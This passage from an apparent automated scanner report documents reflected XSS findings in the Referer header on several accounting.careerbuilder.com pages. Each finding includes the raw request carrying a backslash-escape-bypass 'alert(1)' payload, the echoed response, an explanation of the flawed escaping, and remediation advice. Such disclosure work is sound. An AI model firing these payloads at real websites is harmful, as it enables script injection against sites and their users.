The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c01d8\'%3balert(1)//66349a66c26 was submitted in the Referer HTTP header. This input was echoed as c01d8\\';alert(1)//66349a66c26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida_Miami_Accounting.htm HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=c01d8\'%3balert(1)//66349a66c26

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174676
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR19
Date: Sun, 14 Nov 2010 23:00:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
s_cb.eVar5='JS_AS_City | State | Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14='Miami, FL';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - c01d8\\';alert(1)//66349a66c26';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.263. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsPayable.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_AccountsPayable.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffdf8\'%3balert(1)//964dda6ef0c was submitted in the Referer HTTP header. This input was echoed as ffdf8\\';alert(1)//964dda6ef0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida_Miami_AccountsPayable.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=ffdf8\'%3balert(1)//964dda6ef0c

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 175013
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accountspayable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR12
Date: Sun, 14 Nov 2010 23:15:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
s_cb.eVar5='JS_AS_City | State | Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14='Miami, FL';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - ffdf8\\';alert(1)//964dda6ef0c';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.264. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsPayable.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_AccountsPayable.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd21d\'%3balert(1)//0eb9870a374 was submitted in the Referer HTTP header. This input was echoed as cd21d\\';alert(1)//0eb9870a374 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida_Miami_AccountsPayable.htm HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=cd21d\'%3balert(1)//0eb9870a374

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174943
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accountspayable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR30
Date: Sun, 14 Nov 2010 23:00:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
s_cb.eVar5='JS_AS_City | State | Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14='Miami, FL';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - cd21d\\';alert(1)//0eb9870a374';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.265. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsReceivable.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_AccountsReceivable.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd0bd\'%3balert(1)//90fb2f6d989 was submitted in the Referer HTTP header. This input was echoed as cd0bd\\';alert(1)//90fb2f6d989 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida_Miami_AccountsReceivable.htm HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=cd0bd\'%3balert(1)//90fb2f6d989

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 175006
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accountsreceivable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR24
Date: Sun, 14 Nov 2010 23:00:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
s_cb.eVar5='JS_AS_City | State | Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14='Miami, FL';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - cd0bd\\';alert(1)//90fb2f6d989';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.266. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsReceivable.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_AccountsReceivable.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc7b1\'%3balert(1)//e155036bc0b was submitted in the Referer HTTP header. This input was echoed as cc7b1\\';alert(1)//e155036bc0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to preven